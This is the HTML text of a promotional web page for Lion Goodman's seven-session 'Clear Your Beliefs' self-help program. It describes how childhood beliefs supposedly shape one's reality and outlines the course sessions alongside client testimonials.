attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div 